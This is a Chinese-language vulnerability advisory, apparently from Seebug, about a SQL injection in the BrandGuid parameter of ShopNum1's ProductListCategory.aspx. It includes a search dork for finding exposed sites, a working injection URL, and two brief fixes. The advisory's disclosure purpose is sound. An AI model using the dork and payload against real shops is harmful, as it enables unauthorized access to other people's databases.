ShopNum1 ProductListCategory.aspx文件BrandGuid参数SQL注入漏洞

2016-05-09T00:00:00
ID SSV:91494
Type seebug
Reporter hhxx
Modified 2016-05-09T00:00:00

Description

0x01 框架介绍

ShopNum1网店系统是武汉群翔软件有限公司自主研发的基于 WEB 应用的 B/S 架构的B2C网上商店系统,主要面向中高端客户, 为企业和大中型网商打造优秀的电子商务平台,ShopNum1运行于微软公司的 .NET 平台,采用最新的 ASP.NET 3.5技术进行分层开发。拥有更强的安全性、稳定性、易用性。

官方主页:www.shopnum1.com

影响厂商:武汉群翔软件有限公司

0x02 漏洞利用

关键词:inurl:ProductListCategory.aspx

BrandGuid参数过滤不严导致注入。

利用方式:

http://site/ProductListCategory.aspx?ProductCategoryID=38&BrandGuid=18e018b8-c0c7-4f95-b1fc-0a15d36a8b7d' and 1=char(sys.fn_varbintohexstr(hashbytes('MD5','1'))) and '1'='1

Pocsuite证明:

0x03 修复方案

1、过滤漏洞文件参数

2、使用加速乐等防护产品